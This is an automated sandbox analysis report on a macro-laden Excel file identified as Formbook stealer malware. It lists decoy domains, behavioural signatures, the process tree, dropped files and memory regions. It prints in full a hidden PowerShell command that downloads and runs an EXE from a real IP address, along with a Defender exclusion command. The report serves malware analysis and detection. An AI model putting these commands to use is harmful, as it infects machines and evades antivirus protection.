Overview

overview

10

Static

static

8

SOAPO8829921199.xlsm

windows7-x64

10

SOAPO8829921199.xlsm

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-09-2024 14:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SOAPO8829921199.xlsm

  • Size

    165KB

  • MD5

    c0a096ce5928bce34fffd5874093f235

  • SHA1

    971a8fbd841e42dcab84288205525b89301825c2

  • SHA256

    54929de588e37191bfc6dd0bf4f3edc1fca58c67af0e6bc7b1bd15a66d8c1bf0

  • SHA512

    9d7c5aaf2fe546422ff3379169909929ec50f6eebba27d527178066c943ea2973a72c7501202b9502c8ccd646dfe6b49c1194c34b8f9822404bf1fad6971eb61

  • SSDEEP

    3072:BJNjJehd8PiRjkctohQQRBK0BvyixmZ49ke+jJLNkYa6+Rc64d:BJN06iactuRbB6M9+1GYaza64d

Score
10/10
formbookt20udiscoveryexecutionratspywarestealertrojan

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

t20u

Decoy

ecurity-jobs-ne-00989.bond

ameuniverse.shop

sychologist-therapy-33393.bond

refabricated-homes-33099.bond

urltheswirl.live

reengroce.online

cknowledgewizardinter14.sbs

excasino.club

931.bet

ilehog.net

olorandbrush.net

jpbbmr.biz

vtwenty20pt.top

nline-advertising-76521.bond

eavenresidence.net

arodyna.shop

orsi-di-massaggio.bond

est-kids-toys-near-me.today

47-nurse-76671.bond

u-suppr.top

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

    trojanspywarestealerformbook
  • Process spawned unexpected child process 5 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Formbook payload 2 IoCs
    rat
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 8 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 44 IoCs
  • Suspicious behavior: MapViewOfSection 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 22 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:3424
    • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SOAPO8829921199.xlsm"
      2⤵
      • Checks processor information in registry
      • Enumerates system info in registry
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1924
      • C:\Windows\splwow64.exe
        C:\Windows\splwow64.exe 12288
        3⤵
          PID:3596
      • C:\Windows\SysWOW64\wlanext.exe
        "C:\Windows\SysWOW64\wlanext.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3188
        • C:\Windows\SysWOW64\cmd.exe
          /c del "C:\Users\Public\gvpttllrilhpexthxdz.exe"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:436
      • C:\Windows\SysWOW64\msdt.exe
        "C:\Windows\SysWOW64\msdt.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4772
      • C:\Windows\SysWOW64\help.exe
        "C:\Windows\SysWOW64\help.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3092
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
      1⤵
        PID:548
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command " & { iwr http://45.137.22.181/localsecurrity.exe -OutFile C:\Users\Public\gvpttllrilhpexthxdz.exe}; & {Start-Process -FilePath "C:\Users\Public\gvpttllrilhpexthxdz.exe"}"
        1⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4532
        • C:\Users\Public\gvpttllrilhpexthxdz.exe
          "C:\Users\Public\gvpttllrilhpexthxdz.exe"
          2⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1660
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\gvpttllrilhpexthxdz.exe"
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4876
          • C:\Users\Public\gvpttllrilhpexthxdz.exe
            "C:\Users\Public\gvpttllrilhpexthxdz.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:2984
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command " & { iwr http://45.137.22.181/localsecurrity.exe -OutFile C:\Users\Public\gvpttllrilhpexthxdz.exe}; & {Start-Process -FilePath "C:\Users\Public\gvpttllrilhpexthxdz.exe"}"
        1⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4004
        • C:\Users\Public\gvpttllrilhpexthxdz.exe
          "C:\Users\Public\gvpttllrilhpexthxdz.exe"
          2⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1492
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\gvpttllrilhpexthxdz.exe"
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3416
          • C:\Users\Public\gvpttllrilhpexthxdz.exe
            "C:\Users\Public\gvpttllrilhpexthxdz.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:3900
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command " & { iwr http://45.137.22.181/localsecurrity.exe -OutFile C:\Users\Public\gvpttllrilhpexthxdz.exe}; & {Start-Process -FilePath "C:\Users\Public\gvpttllrilhpexthxdz.exe"}"
        1⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4368
        • C:\Users\Public\gvpttllrilhpexthxdz.exe
          "C:\Users\Public\gvpttllrilhpexthxdz.exe"
          2⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3328
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\gvpttllrilhpexthxdz.exe"
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:60
          • C:\Users\Public\gvpttllrilhpexthxdz.exe
            "C:\Users\Public\gvpttllrilhpexthxdz.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:4516
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command " & { iwr http://45.137.22.181/localsecurrity.exe -OutFile C:\Users\Public\gvpttllrilhpexthxdz.exe}; & {Start-Process -FilePath "C:\Users\Public\gvpttllrilhpexthxdz.exe"}"
        1⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4380
        • C:\Users\Public\gvpttllrilhpexthxdz.exe
          "C:\Users\Public\gvpttllrilhpexthxdz.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:1852
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command " & { iwr http://45.137.22.181/localsecurrity.exe -OutFile C:\Users\Public\gvpttllrilhpexthxdz.exe}; & {Start-Process -FilePath "C:\Users\Public\gvpttllrilhpexthxdz.exe"}"
        1⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4408
        • C:\Users\Public\gvpttllrilhpexthxdz.exe
          "C:\Users\Public\gvpttllrilhpexthxdz.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:2788

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        3KB

        MD5

        556084f2c6d459c116a69d6fedcc4105

        SHA1

        633e89b9a1e77942d822d14de6708430a3944dbc

        SHA256

        88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

        SHA512

        0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\gvpttllrilhpexthxdz.exe.log
        Filesize

        1KB

        MD5

        8ec831f3e3a3f77e4a7b9cd32b48384c

        SHA1

        d83f09fd87c5bd86e045873c231c14836e76a05c

        SHA256

        7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982

        SHA512

        26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        968cb9309758126772781b83adb8a28f

        SHA1

        8da30e71accf186b2ba11da1797cf67f8f78b47c

        SHA256

        92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

        SHA512

        4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        ef99d6f22775dc9249d2657cdc8a7ae8

        SHA1

        dd0225436ce908de98f68f10835116a195ec29df

        SHA256

        2970bb420cbeedbd0eb284a8c5bd2e54013b6c1bea5e495669bb52f44bf00f14

        SHA512

        b652a46f0866f21fa96666ac547fddd99d23813f7b4757eb9604dd68ae49230d46e85dbc9ca4062ea194fc20cfd7e340cf0324bf2fa0c7d00f74b5c30b41810e

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        18KB

        MD5

        e85a2d699fbb1b027466408573af7e61

        SHA1

        4d308696ffbb9443ab3761d19a3bb843c2f0f78f

        SHA256

        5767898e869de136988ac2b02fcaca8d1dbbe483cedaa1a2a40159c9703aaaed

        SHA512

        0908684501bb473bda23a1947838c46cd0ed0fa4ea72bc0b595601c8d6c4b2ac214eec21b5d80c00a50e08e9c09f21df402666cd28d8f2dfad75d3251807bb2d

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        fbbe616c6563865d0f776ed058aec2c4

        SHA1

        68a910fa8fad4b21e8cdc0c0263dbef6cadcc268

        SHA256

        dd1a56d9f57e412134fb8601e43727e06edde336dba81888c6f79828e6c5c0d7

        SHA512

        6422316dddc9efccb04d1b84f38014e4d565d228f6d7e0e799154ccec8dde7c795270cbb1d37e4a5630f3b61b326cb72771e76ad7dcde0d3e6bfcbe9d8802969

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        18KB

        MD5

        2b743a9777c31fef609b23924a4fd6e3

        SHA1

        4ce2dd3060353affafdb0592b009e69179a8ee84

        SHA256

        7bd18dce2aa54dfb0e92d21318ee5b522a4de242bacb775b33269863e0bbe677

        SHA512

        143c9a495e84b51c76e3ad1f733f2e8f3c3ce2e464f7df241c6ed58c4b78fda94e843a13a2b7b8a2ed0696782646ea95f03c04a54fa95b58d4f367e97177d1ff

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        18KB

        MD5

        2fe98c0ce21600be76184ae8a3d42147

        SHA1

        78b876186c687e0c566447912432bc605b0fc9c5

        SHA256

        b97bc5ffd28b4723f95e14eeb579951cfe19e29bd38c471a0810550a36c0ae4e

        SHA512

        477f5dc67b7f8431e008b704a4bfea73febda0ed7be1c9ea3431e49e4ad080a700a4a11b17e4c0b69eb17d3243a5dfcf9025565cdc45d9dca1689e06de05c56b

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        70595b5937369a2592a524db67e208d3

        SHA1

        d989b934d9388104189f365694e794835aa6f52f

        SHA256

        be09b93a020e2e86a0b3c7c3f3d3e2c45f888944b1036df738385ede16f595c8

        SHA512

        edb412886187a2740eb7e284b16838bdd9f011aba1f4581f1fed25a86cdfe9b2ab4df863edeb3db6b072805439d57b10f3e0a1f2daabe1ee56db275ad2ad61e5

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gesj51vy.025.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Public\gvpttllrilhpexthxdz.exe
        Filesize

        607KB

        MD5

        0854c389689bb92cf7463197df6dd98e

        SHA1

        d636129847d4c92a8b6aa15ab7a75ee857c7c9b8

        SHA256

        2779dab5ffc62d1641b00c1093798d2a56ad348168f4d973c2d92ececf0df400

        SHA512

        2a96a18dfa551a551ce4ac4cbefe0c4a4522284d43ae285218157042d99e294441126eb9bcaa6edd6f6875930237a77ac2a8a0fa6370f1e90a8aa701235fe322

        Download Submit

      • memory/60-205-0x0000000005730000-0x0000000005A84000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/60-207-0x0000000070290000-0x00000000702DC000-memory.dmp

        Filesize

        304KB

        Download

      • memory/1660-67-0x0000000005150000-0x000000000515A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/1660-64-0x0000000000550000-0x00000000005EE000-memory.dmp

        Filesize

        632KB

        Download

      • memory/1660-83-0x00000000064C0000-0x000000000655C000-memory.dmp

        Filesize

        624KB

        Download

      • memory/1660-82-0x00000000061F0000-0x0000000006266000-memory.dmp

        Filesize

        472KB

        Download

      • memory/1660-68-0x0000000005270000-0x0000000005288000-memory.dmp

        Filesize

        96KB

        Download

      • memory/1660-66-0x0000000004F90000-0x0000000005022000-memory.dmp

        Filesize

        584KB

        Download

      • memory/1660-65-0x0000000005540000-0x0000000005AE4000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/1924-9-0x00007FF8A1DB0000-0x00007FF8A1FA5000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/1924-7-0x00007FF861E30000-0x00007FF861E40000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1924-0-0x00007FF8A1E4D000-0x00007FF8A1E4E000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1924-23-0x00007FF8A1E4D000-0x00007FF8A1E4E000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1924-13-0x00007FF85FDD0000-0x00007FF85FDE0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1924-11-0x00007FF85FDD0000-0x00007FF85FDE0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1924-6-0x00007FF8A1DB0000-0x00007FF8A1FA5000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/1924-25-0x00007FF8A1DB0000-0x00007FF8A1FA5000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/1924-24-0x00007FF8A1DB0000-0x00007FF8A1FA5000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/1924-3-0x00007FF861E30000-0x00007FF861E40000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1924-10-0x00007FF8A1DB0000-0x00007FF8A1FA5000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/1924-5-0x00007FF8A1DB0000-0x00007FF8A1FA5000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/1924-8-0x00007FF8A1DB0000-0x00007FF8A1FA5000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/1924-12-0x00007FF8A1DB0000-0x00007FF8A1FA5000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/1924-1-0x00007FF861E30000-0x00007FF861E40000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1924-2-0x00007FF861E30000-0x00007FF861E40000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1924-4-0x00007FF861E30000-0x00007FF861E40000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2984-84-0x0000000000400000-0x000000000042F000-memory.dmp

        Filesize

        188KB

        Download

      • memory/3092-218-0x0000000000880000-0x0000000000887000-memory.dmp

        Filesize

        28KB

        Download

      • memory/3188-130-0x0000000000470000-0x0000000000487000-memory.dmp

        Filesize

        92KB

        Download

      • memory/3188-132-0x0000000000A30000-0x0000000000A5F000-memory.dmp

        Filesize

        188KB

        Download

      • memory/3188-131-0x0000000000470000-0x0000000000487000-memory.dmp

        Filesize

        92KB

        Download

      • memory/3416-163-0x0000000070290000-0x00000000702DC000-memory.dmp

        Filesize

        304KB

        Download

      • memory/3416-173-0x0000000007050000-0x00000000070F3000-memory.dmp

        Filesize

        652KB

        Download

      • memory/3416-162-0x00000000061D0000-0x000000000621C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/3416-160-0x0000000005990000-0x0000000005CE4000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/3424-178-0x0000000009410000-0x000000000951A000-memory.dmp

        Filesize

        1.0MB

        Download

      • memory/3424-195-0x0000000009410000-0x000000000951A000-memory.dmp

        Filesize

        1.0MB

        Download

      • memory/4532-46-0x00000237FF2B0000-0x00000237FF2D2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4772-175-0x0000000000460000-0x00000000004B7000-memory.dmp

        Filesize

        348KB

        Download

      • memory/4876-92-0x0000000005870000-0x00000000058D6000-memory.dmp

        Filesize

        408KB

        Download

      • memory/4876-127-0x0000000007510000-0x0000000007518000-memory.dmp

        Filesize

        32KB

        Download

      • memory/4876-126-0x0000000007530000-0x000000000754A000-memory.dmp

        Filesize

        104KB

        Download

      • memory/4876-125-0x0000000007430000-0x0000000007444000-memory.dmp

        Filesize

        80KB

        Download

      • memory/4876-124-0x0000000007420000-0x000000000742E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/4876-123-0x00000000073F0000-0x0000000007401000-memory.dmp

        Filesize

        68KB

        Download

      • memory/4876-122-0x0000000007470000-0x0000000007506000-memory.dmp

        Filesize

        600KB

        Download

      • memory/4876-121-0x0000000007260000-0x000000000726A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/4876-120-0x00000000071F0000-0x000000000720A000-memory.dmp

        Filesize

        104KB

        Download

      • memory/4876-119-0x0000000007870000-0x0000000007EEA000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/4876-118-0x0000000006F40000-0x0000000006FE3000-memory.dmp

        Filesize

        652KB

        Download

      • memory/4876-117-0x00000000064C0000-0x00000000064DE000-memory.dmp

        Filesize

        120KB

        Download

      • memory/4876-107-0x00000000706E0000-0x000000007072C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/4876-106-0x0000000006480000-0x00000000064B2000-memory.dmp

        Filesize

        200KB

        Download

      • memory/4876-105-0x0000000005F10000-0x0000000005F5C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/4876-104-0x0000000005EC0000-0x0000000005EDE000-memory.dmp

        Filesize

        120KB

        Download

      • memory/4876-102-0x0000000005AA0000-0x0000000005DF4000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/4876-91-0x0000000005790000-0x00000000057F6000-memory.dmp

        Filesize

        408KB

        Download

      • memory/4876-90-0x0000000004F00000-0x0000000004F22000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4876-88-0x0000000004FF0000-0x0000000005618000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/4876-87-0x0000000004920000-0x0000000004956000-memory.dmp

        Filesize

        216KB

        Download